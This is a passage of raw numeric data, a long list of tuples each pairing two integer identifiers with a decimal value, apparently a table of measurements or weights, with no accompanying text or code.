(263, 299974, 0.91),
(263, 299975, 1.07331),
(263, 299976, 1.02669),
(263, 299977, 1.09669),
(263, 299978, 2.94),
(263, 299979, 1.09669),
(263, 299980, 1.07331),
(263, 299981, 1.14331),
(263, 299982, 1.16669),
(263, 299983, 1.28331),
(263, 299984, 0.93331),
(263, 299985, 1.00331),
(263, 299986, 0.98),
(263, 299987, 1.23669),
(263, 299988, 0.93331),
(263, 299989, 1.05),
(263, 299990, 1.05),
(263, 299991, 0.91),
(263, 299992, 1.02669),
(263, 299993, 1.21331),
(263, 299994, 0.88669),
(263, 299995, 0.98),
(263, 299996, 0.91),
(263, 299997, 0.98),
(263, 299998, 1.09669),
(263, 299999, 1.05),
(263, 300000, 1.26),
(263, 300001, 0.93331),
(263, 300002, 0.95669),
(263, 300003, 1.05),
(263, 300004, 0.98),
(263, 300005, 1.09669),
(263, 300006, 0.91),
(263, 300007, 1.05),
(263, 300008, 0.91),
(263, 300009, 1.00331),
(263, 300010, 1.09669),
(263, 300011, 0.23331),
(263, 300012, 1.02669),
(263, 300013, 1.09669),
(263, 300014, 1.21331),
(264, 300354, 0.79331),
(264, 300355, 0.91),
(264, 300356, 0.84),
(264, 300357, 0.91),
(264, 300358, 1.00331),
(264, 300359, 2.4666),
(264, 300360, 2.7334),
(264, 300448, 0.95669),
(264, 300449, 1.05),
(264, 300450, 1.12),
(264, 300451, 1.23669),
(264, 300452, 0.37331),
(264, 300453, 0.98),
(264, 300454, 1.23669),
(264, 300455, 1.00331),
(264, 300456, 1.12),
(264, 300457, 0.28),
(264, 300458, 0.93331),
(264, 300459, 1.02669),
(264, 300460, 0.81669),
(264, 300461, 0.88669),
(264, 300462, 0.95669),
(264, 300463, 1.05),
(264, 300464, 0.28),
(264, 300465, 0.93331),
(264, 300466, 1.09669),
(264, 300467, 0.42),
(264, 300468, 1.00331),
(264, 300469, 1.14331),
(264, 300719, 0.23331),
(264, 300720, 0.91),
(264, 300721, 0.95669),
(264, 300722, 1.05),
(264, 300723, 1.02669),
(264, 300724, 1.09669),
(264, 300725, 1.05),
(264, 300726, 0.95669),
(264, 300727, 1.02669),
(264, 300728, 0.98),
(264, 300729, 1.05),
(264, 300730, 0.93331),
(264, 300731, 1.00331),
(264, 300732, 1.07331),
(264, 300733, 0.91),
(264, 300734, 1.00331),
(264, 300735, 1.12),
(264, 300736, 0.91),
(264, 300737, 1.02669),
(264, 300738, 2.87007),
(264, 300739, 1.02669),
(264, 300740, 1.16669),
(264, 300741, 1.07331),
(264, 300742, 2.87007),
(264, 300743, 1.00331),
(264, 300744, 1.02669),
(264, 300745, 1.05),
(264, 300746, 1.16669),
(264, 300747, 1.05),
(264, 300748, 1.02669),
(264, 300749, 1.09669),
(264, 300750, 1.05),
(264, 300751, 0.88669),
(264, 300752, 1.00331),
(264, 300753, 1.12),
(264, 300754, 1.00331),
(264, 300755, 1.07331),
(264, 300756, 2.87007),
(264, 300757, 1.05),
(264, 300758, 2.1),
(264, 300759, 0.95669),
(264, 300760, 1.02669),
(264, 300761, 0.88669),
(264, 300762, 1.02669),
(264, 300763, 1.07331),
(264, 300764, 1.16669),
(264, 300765, 1.09669),
(264, 300766, 1.09669),
(264, 300767, 1.07331),
(264, 300768, 0.88669),
(264, 300769, 0.91),
(264, 300770, 1.00331),
(264, 300771, 1.05),
(264, 300772, 1.00331),
(264, 300773, 0.98),
(264, 300774, 0.98),
(264, 300775, 1.00331),
(264, 300776, 0.98),
(264, 300777, 1.07331),
(264, 300778, 0.91),
(264, 300779, 1.09669),
(267, 300872, 0.79331),
(267, 300873, 0.84),
(267, 301054, 1.00331),
(267, 301055, 0.93331),
(267, 301056, 1.00331),
(267, 301057, 0.32669),
(267, 301058, 0.98),
(267, 301059, 1.14331),
(267, 301060, 1.00331),
(267, 301061, 1.19),
(267, 301062, 0.60669),
(267, 301063, 1.12),
(267, 301064, 1.28331),
(267, 301065, 1.12),
(267, 301395, 0.88669),
(267, 301396, 1.05),
(267, 301397, 1.02669),
(267, 301398, 0.98),
(267, 301399, 1.07331),
(267, 301400, 1.02669),
(267, 301401, 1.02669),
(267, 301402, 1.00331),
(267, 301403, 0.95669),
(267, 301404, 1.21331),
(267, 301405, 0.86331),
(267, 301406, 0.93331),
(267, 301407, 1.05),
(267, 301408, 1.05),
(267, 301409, 1.05),
(267, 301410, 1.12),
(267, 301411, 1.00331),
(267, 301412, 1.23669),
(267, 301413, 1.02669),
(267, 301414, 0.98),
(267, 301415, 1.07331),
(267, 301416, 1.02669),
(267, 301417, 1.23669),
(267, 301418, 1.16669),
(267, 301419, 1.07331),
(267, 301420, 2.14662),
(304, 301420, 2.14662),
(267, 301421, 0.95669),
(267, 301422, 1.07331),
(267, 301423, 1.00331),
(267, 301424, 1.07331),
(267, 301425, 0.95669),
(267, 301426, 1.09669),
(267, 301427, 0.91),
(267, 301428, 1.02669),
(267, 301429, 1.19),
(267, 301430, 1.07331),
(267, 301431, 1.28331),
(267, 301432, 1.02669),
(267, 301433, 1.12),
(267, 301434, 1.09669),
(267, 301435, 1.05),
(267, 301436, 0.95669),
(267, 301437, 0.98),
(267, 301438, 1.05),
(267, 301439, 1.00331),
(267, 301440, 1.09669),
(267, 301441, 0.93331),
(290, 301441, 0.93331),
(267, 301442, 1.00331),
(267, 301443, 0.93331),
(267, 301444, 0.98),
(267, 301445, 1.05),
(267, 301446, 1.00331),
(267, 301447, 1.21331),
(267, 301448, 0.88669),
(267, 301449, 1.00331),
(268, 302077, 0.84),
(268, 302078, 0.95669),
(268, 302079, 0.37331),
(268, 302080, 0.95669),
(268, 302081, 1.07331),
(268, 302082, 0.98007),
(268, 302083, 0.95669),
(268, 302084, 1.16669),
(268, 302085, 0.98),
(268, 302086, 1.07331),
(268, 302087, 0.98),
(268, 302088, 1.09669),
(268, 302089, 0.37331),
(268, 302090, 0.98),
(268, 302091, 1.09669),
(268, 302092, 1.00331),
(268, 302093, 1.07331),
(268, 302094, 1.07331),
(268, 302484, 1.00331),
(268, 302485, 1.07331),
(268, 302486, 0.91),
(268, 302487, 1.00331),
(268, 302488, 0.98),
(268, 302489, 0.91),
(268, 302490, 1.00331),
(268, 302491, 1.19),
(268, 302492, 0.91),
(268, 302493, 1.02669),
(268, 302494, 0.93331),
(268, 302495, 1.16669),
(268, 302496, 0.88669),
(268, 302497, 1.00331),
(268, 302498, 1.00331),
(268, 302499, 1.07331),
(268, 302500, 1.02669),
(268, 302501, 1.12),
(268, 302502, 1.05),
(268, 302503, 0.95669),
(268, 302504, 0.98),
(268, 302505, 1.14331),
(268, 302506, 0.91),
(268, 302507, 0.98),
(268, 302508, 1.00331),
(268, 302509, 1.02669),
(268, 302510, 1.23669),
(268, 302511, 0.88669),
(268, 302512, 1.00331),
(268, 302513, 3.73324),
(268, 302514, 1.02669),
(268, 302515, 1.05),
(268, 302516, 1.14331),
(268, 302517, 1.05),
(268, 302518, 1.02669),
(305, 302518, 1.02669),
(268, 302519, 1.07331),
(268, 302520, 1.02669),
(268, 302521, 1.05),
(268, 302522, 0.95669),
(268, 302523, 1.02669),
(268, 302524, 0.88669),
(268, 302525, 0.95669),
(268, 302526, 0.88669),
(268, 302527, 0.98),
(268, 302528, 0.86331),
(268, 302529, 1.00331),
(268, 302530, 0.98),
(268, 302531, 1.07331),
(268, 302532, 0.86331),
(268, 302533, 0.93331),
(268, 302534, 1.02669),
(268, 302535, 1.21331),
(268, 302536, 1.05),
(268, 302537, 1.19),
(268, 302538, 0.98),
(268, 302539, 1.00331),
(268, 302540, 0.93331),
(268, 302541, 1.07331),
(268, 302542, 0.86331),
(304, 302542, 0.86331),
(268, 302543, 0.93331),
(268, 302544, 0.91),
(268, 302545, 1.02669),
(268, 302546, 0.93331),
(268, 302547, 1.07331),
(268, 302548, 0.98),
(268, 302549, 0.86331),
(268, 302550, 0.95669),
(268, 302551, 0.93331),
(268, 302552, 0.88669),
(268, 302553, 0.93331),
(268, 302554, 0.91),
(268, 302555, 1.00331),
(268, 302556, 0.88669),
(268, 302557, 1.05),
(268, 302558, 0.37338),
(268, 302559, 0.91),
(268, 302560, 1.00331),
(268, 302561, 0.88669),
(268, 302562, 1.00331),
(268, 302563, 0.86331),
(268, 302564, 0.98),
(269, 302910, 6.65019),
(269, 302911, 7.59981),
(269, 303062, 0.86331),
(269, 303063, 1.00331),
(269, 303064, 1.00331),
(269, 303065, 0.95669),
(269, 303066, 1.02669),
(269, 303067, 0.32669),
(269, 303068, 0.95669),
(269, 303069, 1.09669),
(269, 303070, 2.00662),
(269, 303071, 1.07331),
(269, 303072, 1.09669),
(269, 303073, 1.09669),
(269, 303074, 1.09669),
(269, 303368, 0.93331),
(269, 303369, 1.16669),
(269, 303370, 1.07331),
(269, 303371, 0.84),
(269, 303372, 0.93331),
(269, 303373, 1.00331),
(269, 303374, 0.91),
(269, 303375, 1.12),
(269, 303376, 0.93331),
(269, 303377, 0.98),
(269, 303378, 0.18669),
(269, 303379, 0.88669),
(269, 303380, 0.93331),
(269, 303381, 0.91),
(292, 303381, 0.91),
(269, 303382, 1.05),
(269, 303383, 0.98),
(269, 303384, 0.98),
(269, 303385, 0.95669),
(269, 303386, 1.09669),
(269, 303387, 0.95669),
(269, 303388, 1.05),
(269, 303389, 1.02669),
(269, 303390, 0.91),
(269, 303391, 0.98),
(269, 303392, 0.95669),
(269, 303393, 1.00331),
(269, 303394, 1.05),
(269, 303395, 3.08007),
(269, 303396, 1.05),
(269, 303397, 0.95669),
(269, 303398, 1.00331),
(269, 303399, 1.02669),
(269, 303400, 1.12),
(269, 303401, 0.98),
(269, 303402, 1.09669),
(269, 303403, 1.05),
(306, 303403, 1.05),
(269, 303404, 0.95669),
(269, 303405, 0.88669),
(269, 303406, 0.98),
(269, 303407, 0.93331),
(269, 303408, 1.12),
(269, 303409, 1.02669),
(269, 303410, 1.00331),
(269, 303411, 1.23669),
(269, 303412, 1.07331),
(269, 303413, 0.93331),
(269, 303414, 1.00331),
(269, 303415, 1.07331),
(269, 303416, 0.91),
(269, 303417, 0.95669),
(269, 303418, 1.00331),
(269, 303419, 0.98),
(269, 303420, 0.93331),
(269, 303421, 1.02669),
(269, 303422, 0.81669),
(269, 303423, 0.91),
(269, 303424, 0.93331),
(269, 303425, 1.07331),
(269, 303426, 1.02669),
(269, 303427, 0.98),
(269, 303428, 1.91338),
(269, 303429, 0.93331),
(269, 303430, 1.02669),
(269, 303431, 1.00331),
(269, 303432, 0.98),
(269, 303433, 0.93331),
(269, 303434, 1.07331),
(269, 303435, 1.02669),
(269, 303436, 1.00331),
(269, 303437, 1.12),
(269, 303438, 0.81669),
(269, 303439, 0.95669),
(269, 303440, 0.93331),
(269, 303441, 1.05),
(273, 303974, 2.89),
(274, 303979, 0.74),
(274, 303980, 2.4),
(274, 303981, 2.6),
(274, 304154, 0.86331),
(274, 304155, 1.02669),
(274, 304156, 1.02669),
(274, 304157, 0.32669),
(274, 304158, 0.95669),
(274, 304159, 1.21331),
(274, 304160, 1.11993),
(274, 304161, 2.94),
(274, 304162, 1.21331),
(274, 304163, 2.42662),
(274, 304164, 0.56),
(306, 304164, 1.12),
(274, 304165, 1.00331),
(274, 304166, 1.16669),
(274, 304167, 0.93331),
(274, 304168, 1.02669),
(274, 304169, 1.12),
(274, 304170, 1.02669),
(274, 304171, 1.12),
(274, 304172, 0.95669),
(274, 304173, 1.05),
(274, 304551, 0.84),
(274, 304552, 0.95669),
(274, 304553, 1.12),
(274, 304554, 0.98),
(274, 304555, 1.12),
(274, 304556, 1.02669),
(274, 304557, 1.07331),
(274, 304558, 0.93331),
(274, 304559, 0.93331),
(304, 304559, 0.93331),
(306, 304559, 0.93331),
(274, 304560, 1.00331),
(274, 304561, 1.00331),
(274, 304562, 1.07331),
(274, 304563, 1.00331),
(274, 304564, 1.14331),
(274, 304565, 0.98),
(274, 304566, 2.00662),
(274, 304567, 1.07331),
(274, 304568, 1.12),
(274, 304569, 0.91),
(274, 304570, 0.95669),
(274, 304571, 2.05338),
(274, 304572, 2.19338),
(274, 304573, 1.12),
(274, 304574, 0.98),
(274, 304575, 2.00662),
(274, 304576, 1.09669),
(274, 304577, 1.07331),
(274, 304578, 1.05),
(306, 304578, 2.1),
(274, 304579, 1.02669),
(274, 304580, 1.02669),
(274, 304581, 1.02669),
(274, 304582, 10.2898),
(274, 304583, 1.16669),
(274, 304584, 0.91),
(274, 304585, 1.12),
(274, 304586, 0.95669),
(274, 304587, 1.02669),
(274, 304588, 1.00331),
(305, 304588, 1.00331),
(274, 304589, 1.09669),
(274, 304590, 4.01324),
(274, 304591, 4.76),
(274, 304592, 1.07331),
(274, 304593, 0.93331),
(274, 304594, 0.84),
(274, 304595, 1.02669),
(274, 304596, 1.77338),
(274, 304597, 1.05),
(274, 304598, 0.93331),
(274, 304599, 0.86331),
(274, 304600, 0.95669),
(274, 304601, 1.05),
(274, 304602, 1.16669),
(274, 304603, 1.12),
(274, 304604, 1.09669),
(274, 304605, 1.02669),
(274, 304606, 1.09669),
(274, 304607, 1.07331),
(274, 304608, 1.14331),
(274, 304609, 1.14331),
(274, 304610, 1.21331),
(274, 304611, 1.07331),
(274, 304612, 1.16669),
(274, 304613, 0.91),
(274, 304614, 1.00331),
(274, 304615, 1.02669),
(274, 304616, 1.09669),
(274, 304617, 0.95669),
(274, 304618, 1.12),
(274, 304619, 0.98),
(274, 304620, 1.12),
(274, 304621, 1.28331),
(274, 304622, 0.95669),
(274, 304623, 1.09669),
(274, 304624, 0.86331),
(306, 304624, 1.72662),
(274, 304625, 0.98),
(306, 304625, 0.98),
(274, 304626, 1.02669),
(274, 304627, 0.91),
(274, 304628, 1.00331),
(274, 304629, 0.88669),
(274, 304630, 1.00331),
(274, 304631, 0.91),
(274, 304632, 8.96),
(274, 304633, 9.81312),
(274, 304634, 1.02669),
(274, 304635, 1.02669),
(274, 304636, 0.86331),
(274, 304637, 0.95669),
(274, 304638, 1.05),
(274, 304639, 0.98),
(274, 304640, 1.05),
(274, 304641, 1.00331),
(274, 304642, 1.05),
(274, 304643, 1.02669),
(274, 304644, 0.98),
(274, 304645, 0.95669),
(274, 304646, 1.14331),
(274, 304647, 1.16669),
(275, 305002, 2.3334),
(275, 305003, 2.6),
(275, 305119, 0.18669),
(275, 305120, 0.84),
(275, 305121, 0.91),
(275, 305122, 0.18669),
(275, 305123, 0.93331),
(275, 305124, 1.12),
(275, 305125, 0.86331),
(275, 305126, 0.98),
(275, 305127, 0.84),
(275, 305128, 0.95669),
(275, 305129, 0.37331),
(275, 305130, 1.19),
(275, 305131, 1.26),
(275, 305132, 1.00331),
(275, 305133, 1.09669),
(275, 305134, 1.19),
(275, 305135, 0.93331),
(275, 305136, 0.98),
(275, 305422, 1.00331),
(275, 305423, 1.16669),
(275, 305424, 0.98),
(275, 305425, 1.07331),
(275, 305426, 1.26),
(275, 305427, 1.21331),
(275, 305428, 0.91),
(275, 305429, 1.09669),
(275, 305430, 1.12),
(275, 305431, 1.00331),
(290, 305431, 1.00331),
(306, 305431, 1.00331),
(275, 305432, 1.02669),
(275, 305433, 1.00331),
(275, 305434, 1.00331),
(275, 305435, 1.21331),
(275, 305436, 1.19),
(275, 305437, 1.07331),
(275, 305438, 8.16981),
(275, 305439, 0.98),
(275, 305440, 0.98),
(275, 305441, 1.05),
(275, 305442, 1.07331),
(275, 305443, 1.05),
(275, 305444, 0.91),
(275, 305445, 0.98),
(275, 305446, 1.02669),
(275, 305447, 0.88669),
(275, 305448, 0.95669),
(275, 305449, 0.98),
(275, 305450, 1.02669),
(275, 305451, 0.91),
(275, 305452, 0.98),
(275, 305453, 0.91),
(275, 305454, 1.00331),
(275, 305455, 1.00331),
(275, 305456, 1.02669),
(275, 305457, 1.09669),
(275, 305458, 1.23669),
(275, 305459, 1.00331),
(275, 305460, 1.16669),
(275, 305461, 1.23669),
(275, 305462, 1.16669),
(275, 305463, 1.07331),
(275, 305464, 1.21331),
(275, 305465, 0.98),
(275, 305466, 0.95669),
(275, 305467, 1.19),
(275, 305468, 2.42662),
(275, 305469, 0.86331),
(275, 305470, 0.91),
(275, 305471, 1.14331),
(275, 305472, 1.12),
(275, 305473, 0.88669),
(275, 305474, 0.95669),
(275, 305475, 1.00331),
(275, 305476, 1.05),
(275, 305477, 0.98),
(275, 305478, 0.95669),
(275, 305479, 1.02669),
(275, 305480, 1.02669),
(275, 305481, 0.88669),
(275, 305482, 0.95669),
(275, 305483, 0.98),
(275, 305484, 1.07331),
(275, 305485, 0.32669),
(275, 305486, 0.95669),
(275, 305487, 1.14331),
(275, 305488, 0.88669),
(290, 305488, 0.88669),
(275, 305489, 1.00331),
(280, 307584, 0.74),
(280, 307585, 2.6666),
(280, 307586, 3.4),
(280, 307595, 10.0702),
(287, 312748, 0.84),
(287, 312749, 0.88669),
(287, 312752, 0.88669),
(287, 312753, 0.93331),
(287, 312754, 0.91),
(287, 312755, 1.12),
(287, 312756, 0.74),
(287, 312757, 2.6),
(287, 312758, 3.0666),
(287, 312845, 0.46669),
(287, 312846, 1.00331),
(287, 312847, 1.05),
(287, 312848, 0.84),
(287, 312849, 0.98),
(287, 312850, 1.07331),
(287, 312851, 0.98),
(287, 312852, 1.12),
(287, 312853, 0.95669),
(287, 312854, 1.12),
(287, 312985, 1.07331),
(287, 312986, 0.98),
(287, 312987, 0.95669),
(287, 312988, 1.05),
(287, 312989, 0.95669),
(287, 312990, 0.98),
(287, 312991, 1.07331),
(287, 312992, 0.95669),
(287, 312993, 1.00331),
(287, 312994, 0.98),
(287, 312995, 0.95669),
(287, 312996, 1.02669),
(287, 312997, 0.88669),
(287, 312998, 1.07331),
(287, 312999, 0.79331),
(287, 313000, 0.98),
(287, 313001, 0.95669),
(287, 313002, 0.98),
(292, 313002, 0.98),
(287, 313003, 1.02669),
(288, 313243, 0.86331),
(288, 313244, 0.95669),
(288, 313245, 0.74),
(288, 313246, 2.6),
(288, 313247, 3.4),
(288, 313434, 0.88669),
(288, 313435, 0.98),
(288, 313436, 0.95669),
(288, 313437, 1.07331),
(288, 313438, 0.46669),
(288, 313439, 1.02669),
(288, 313440, 1.30669),
(288, 313441, 0.95669),
(288, 313442, 1.07331),
(288, 313443, 0.28),
(288, 313444, 0.95669),
(288, 313445, 1.05),
(288, 313446, 0.91),
(288, 313447, 1.02669),
(288, 313448, 1.12),
(288, 313449, 1.09669),
(288, 313450, 0.91),
(288, 313451, 1.09669),
(288, 313452, 1.07331),
(288, 313453, 1.21331),
(288, 313454, 0.37331),
(288, 313455, 0.98),
(288, 313456, 1.07331),
(288, 313794, 0.98),
(288, 313795, 1.00331),
(288, 313796, 0.93331),
(288, 313797, 1.02669),
(288, 313798, 1.02669),
(288, 313799, 1.12),
(288, 313800, 1.05),
(288, 313801, 1.00331),
(288, 313802, 1.28331),
(288, 313803, 0.91),
(288, 313804, 0.98),
(288, 313805, 1.00331),
(288, 313806, 1.00331),
(288, 313807, 1.00331),
(288, 313808, 1.23669),
(288, 313809, 0.98),
(288, 313810, 1.02669),
(288, 313811, 1.05),
(288, 313812, 0.93331),
(288, 313813, 1.00331),
(288, 313814, 0.93331),
(288, 313815, 1.02669),
(288, 313816, 1.12),
(288, 313817, 0.93331),
(288, 313818, 1.05),
(288, 313819, 0.93331),
(288, 313820, 1.00331),
(288, 313821, 0.93331),
(288, 313822, 0.98),
(288, 313823, 1.09669),
(288, 313824, 1.05),
(288, 313825, 0.98),
(292, 313825, 0.98),
(288, 313826, 1.16669),
(288, 313827, 0.91),
(304, 313827, 0.91),
(288, 313828, 0.98),
(304, 313828, 0.98),
(288, 313829, 1.14331),
(288, 313830, 1.02669),
(288, 313831, 1.00331),
(288, 313832, 1.09669),
(306, 313832, 1.09669),
(288, 313833, 1.16669),
(306, 313833, 1.16669),
(288, 313834, 1.00331),
(288, 313835, 1.09669),
(288, 313836, 1.12),
(288, 313837, 1.07331),
(288, 313838, 0.98),
(288, 313839, 1.96),
(288, 313840, 1.09669),
(288, 313841, 0.88669),
(288, 313842, 0.95669),
(288, 313843, 0.93331),
(288, 313844, 1.00331),
(288, 313845, 1.02669),
(288, 313846, 1.00331),
(288, 313847, 1.12),
(288, 313848, 1.21331),
(288, 313849, 0.95669),
(288, 313850, 1.02669),
(288, 313851, 1.12),
(288, 313852, 1.23669),
(288, 313853, 1.02669),
(288, 313854, 1.12),
(288, 313855, 0.91),
(288, 313856, 1.00331),
(288, 313857, 1.96),
(288, 313858, 1.02669),
(288, 313859, 1.23669),
(288, 313860, 0.93331),
(288, 313861, 1.00331),
(288, 313862, 0.88669),
(288, 313863, 1.05),
(288, 313864, 1.05),
(288, 313865, 1.05),
(288, 313866, 1.14331),
(288, 313867, 1.07331),
(288, 313868, 1.02669),
(288, 313869, 1.14331),
(288, 313870, 1.07331),
(288, 313871, 1.05),
(288, 313872, 1.02669),
(288, 313873, 1.09669),
(288, 313874, 0.98),
(288, 313875, 1.09669),
(288, 313876, 0.95669),
(288, 313877, 0.88669),
(288, 313878, 0.95669),
(288, 313879, 1.05),
(288, 313880, 1.00331),
(288, 313881, 1.00331),
(288, 313882, 1.00331),
(288, 313883, 0.91),
(288, 313884, 1.00331),
(288, 313885, 1.02669),
(288, 313886, 1.96),
(288, 313887, 0.93331),
(288, 313888, 1.05),
(288, 313889, 1.07331),
(288, 313890, 0.51331),
(288, 313891, 1.05),
(288, 313892, 1.26),
(288, 313893, 0.88669),
(288, 313894, 1.00331),
(290, 315292, 2.4),
(290, 315293, 2.5334),
(290, 315454, 1.07331),
(290, 315455, 1.14331),
(290, 315456, 1.02669),
(290, 315457, 1.14331),
(290, 315458, 2.05338),
(290, 315459, 1.19),
(290, 315460, 1.16669),
(306, 315734, 0.09338),
(290, 315734, 0.2668),
(290, 315735, 4.9332),
(290, 315736, 5.4668),
(290, 315737, 0.86331),
(290, 315738, 1.05),
(290, 315739, 1.12),
(290, 315740, 0.86331),
(290, 315741, 1.00331),
(290, 315742, 0.88669),
(290, 315743, 1.07331),
(290, 315744, 0.93331),
(290, 315745, 1.02669),
(290, 315746, 1.07331),
(290, 315747, 0.91),
(290, 315748, 0.98),
(290, 315749, 1.09669),
(290, 315750, 0.93331),
(290, 315751, 1.02669),
(290, 315752, 0.95669),
(290, 315753, 0.98),
(290, 315754, 1.07331),
(290, 315755, 0.91),
(290, 315756, 0.98),
(290, 315757, 0.95669),
(290, 315758, 1.09669),
(290, 315759, 1.16669),
(290, 315760, 2.94),
(290, 315761, 1.00331),
(290, 315762, 1.07331),
(290, 315763, 1.05),
(290, 315764, 0.98),
(290, 315765, 0.98),
(290, 315766, 0.95669),
(290, 315767, 0.95669),
(290, 315768, 1.05),
(290, 315769, 0.88669),
(292, 315769, 0.88669),
(290, 315770, 0.95669),
(290, 315771, 0.98),
(290, 315772, 1.16669),
(290, 315773, 0.91),
(290, 315774, 0.98),
(290, 315775, 1.05),
(290, 315776, 0.93331),
(290, 315777, 0.98),
(290, 315778, 0.91),
(290, 315779, 1.00331),
(290, 315780, 0.93331),
(290, 315781, 1.02669),
(290, 315782, 0.88669),
(290, 315783, 0.98),
(290, 315784, 0.98),
(290, 315785, 1.14331),
(290, 315786, 0.86331),
(290, 315787, 0.95669),
(290, 315788, 0.91),
(290, 315789, 1.00331),
(290, 315790, 0.86331),
(290, 315791, 0.95669),
(290, 315792, 3.92),
(290, 315793, 0.98),
(306, 315793, 0.98),
(290, 315794, 1.00331),
(290, 315795, 1.00331),
(290, 315796, 1.07331),
(290, 315797, 0.95669),
(292, 317342, 0.88669),
(292, 317343, 0.98),
(292, 317344, 2.4),
(292, 317345, 2.6666),
(292, 317510, 0.51331),
(292, 317511, 1.07331),
(292, 317512, 1.16669),
(292, 317513, 1.12),
(292, 317514, 0.37331),
(292, 317515, 0.98),
(292, 317516, 1.05),
(292, 317517, 1.02669),
(292, 317518, 0.56),
(292, 317519, 0.93331),
(292, 317520, 1.02669),
(292, 317521, 0.91),
(292, 317522, 1.00331),
(292, 317523, 1.23669),
(292, 317524, 1.00331),
(292, 317525, 1.23669),
(292, 317526, 0.93331),
(292, 317527, 1.05),
(292, 317958, 0.91),
(292, 317959, 1.07331),
(292, 317960, 0.98),
(292, 317961, 0.93331),
(292, 317962, 1.00331),
(292, 317963, 1.00331),
(292, 317964, 1.05),
(292, 317965, 1.12),
(292, 317966, 1.09669),
(292, 317967, 1.00331),
(292, 317968, 1.00331),
(292, 317969, 0.98),
(292, 317970, 0.95669),
(292, 317971, 0.98),
(292, 317972, 1.05),
(292, 317973, 1.05),
(292, 317974, 1.16669),
(292, 317975, 1.02669),
(292, 317976, 1.09669),
(292, 317977, 1.12),
(292, 317978, 0.91),
(292, 317979, 0.98),
(292, 317980, 1.00331),
(292, 317981, 0.95669),
(292, 317982, 1.00331),
(292, 317983, 0.98),
(292, 317984, 1.02669),
(292, 317985, 1.07331),
(292, 317986, 1.02669),
(292, 317987, 0.95669),
(292, 317988, 1.05),
(292, 317989, 1.12),
(292, 317990, 1.02669),
(292, 317991, 1.09669),
(292, 317992, 0.98),
(292, 317993, 1.07331),
(292, 317994, 1.02669),
(292, 317995, 0.88669),
(292, 317996, 0.93331),
(292, 317997, 0.81669),
(292, 317998, 0.86331),
(292, 317999, 0.98),
(292, 318000, 1.09669),
(292, 318001, 0.98),
(305, 318001, 0.98),
(292, 318002, 0.93331),
(292, 318003, 1.02669),
(292, 318004, 0.91),
(292, 318005, 1.02669),
(292, 318006, 1.00331),
(292, 318007, 1.00331),
(292, 318008, 0.84),
(292, 318009, 0.95669),
(292, 318010, 0.95669),
(292, 318011, 1.14331),
(292, 318012, 0.98),
(292, 318013, 1.09669),
(292, 318014, 0.93331),
(292, 318015, 1.00331),
(292, 318016, 0.95669),
(292, 318017, 1.19),
(292, 318018, 1.00331),
(292, 318019, 0.93331),
(292, 318020, 1.05),
(292, 318021, 0.93331),
(292, 318022, 1.05),
(292, 318023, 0.46669),
(292, 318024, 0.98),
(292, 318025, 1.07331),
(292, 318026, 0.91),
(292, 318027, 1.05),
(292, 318028, 0.98),
(292, 318029, 1.07331),
(292, 318030, 0.98),
(292, 318031, 1.19),
(292, 318032, 0.95669),
(292, 318033, 1.00331),
(292, 318034, 1.07331),
(292, 318035, 0.98),
(292, 318036, 0.86331),
(292, 318037, 0.91),
(292, 318038, 1.00331),
(292, 318039, 1.00331),
(292, 318040, 1.05),
(292, 318041, 1.07331),
(292, 318042, 0.91),
(292, 318043, 0.98),
(292, 318044, 1.02669),
(292, 318045, 0.93331),
(292, 318046, 1.02669),
(292, 318047, 0.91),
(292, 318048, 1.05),
(292, 318049, 0.91),
(292, 318050, 0.98),
(292, 318051, 0.93331),
(292, 318052, 1.07331),
(292, 318053, 1.02669),
(292, 318054, 1.00331),
(292, 318055, 0.91),
(292, 318056, 1.05),
(292, 318057, 0.91),
(292, 318058, 1.05),
(292, 318059, 0.93331),
(292, 318060, 1.00331),
(292, 318061, 1.00331),
(292, 318062, 1.00331),
(292, 318063, 0.91),
(292, 318064, 1.00331),
(292, 318065, 0.84),
(292, 318066, 1.07331),
(292, 318067, 0.86331),
(292, 318068, 0.98),
(292, 318069, 0.98),
(292, 318070, 1.16669),
(294, 318423, 0.81669),
(294, 318424, 0.91),
(294, 318425, 0.81669),
(294, 318426, 0.79331),
(294, 318427, 0.88669),
(294, 318431, 2.6666),
(294, 318432, 3),
(295, 318508, 0.7),
(295, 318509, 1.09669),
(295, 318510, 1.28331),
(295, 318511, 0.7),
(295, 318512, 1.09669),
(295, 318513, 1.28331),
(295, 318514, 0.18669),
(295, 318515, 0.86331),
(295, 318516, 1.00331),
(295, 318519, 0.74),
(295, 318520, 2.4666),
(295, 318521, 2.9334),
(295, 318522, 0.42),
(295, 318523, 2.58993),
(295, 318524, 1.02669),
(295, 318525, 1.07331),
(295, 318526, 1.02669),
(295, 318607, 0.32669),
(295, 318608, 0.93331),
(295, 318609, 1.09669),
(295, 318610, 0.42),
(295, 318611, 1.02669),
(295, 318612, 1.4),
(295, 318613, 0.46669),
(295, 318614, 1.07331),
(295, 318615, 1.23669),
(295, 318799, 0.88669),
(295, 318800, 1.05),
(295, 318801, 1.14331),
(295, 318802, 1.07331),
(295, 318803, 0.23331),
(295, 318804, 1.00331),
(295, 318805, 1.09669),
(295, 318806, 0.98),
(295, 318807, 1.05),
(295, 318808, 0.37331),
(295, 318809, 1.14331),
(295, 318810, 1.28331),
(295, 318811, 0.95669),
(295, 318812, 1.05),
(295, 318813, 0.95669),
(295, 318814, 0.23331),
(295, 318815, 0.98),
(295, 318816, 1.14331),
(295, 318817, 1.23669),
(295, 318818, 1.35331),
(298, 320120, 0.56),
(308, 320120, 0.56),
(298, 320121, 1.12),
(308, 320121, 1.12),
(298, 320122, 1.21331),
(308, 320122, 1.21331),
(298, 320123, 0.95669),
(308, 320123, 0.95669),
(298, 320124, 1.14331),
(308, 320124, 1.14331),
(298, 320125, 1.00331),
(308, 320125, 1.00331),
(298, 320126, 1.09669),
(308, 320126, 1.09669),
(298, 320127, 0.93331),
(308, 320127, 0.93331),
(298, 320128, 1.16669),
(308, 320128, 1.16669),
(298, 320129, 0.93331),
(308, 320129, 0.93331),
(298, 320130, 1.21331),
(308, 320130, 1.21331),
(298, 320131, 1.07331),
(308, 320131, 1.07331),
(298, 320132, 1.16669),
(308, 320132, 1.16669),
(298, 320373, 1.05),
(308, 320373, 1.05),
(298, 320374, 0.98),
(308, 320374, 0.98),
(298, 320375, 1.09669),
(308, 320375, 1.09669),
(298, 320376, 1.05),
(308, 320376, 1.05),
(298, 320377, 0.98),
(308, 320377, 0.98),
(298, 320378, 1.05),
(308, 320378, 1.05),
(298, 320379, 1.07331),
(308, 320379, 1.07331),
(298, 320380, 0.98),
(308, 320380, 0.98),
(298, 320381, 1.05),
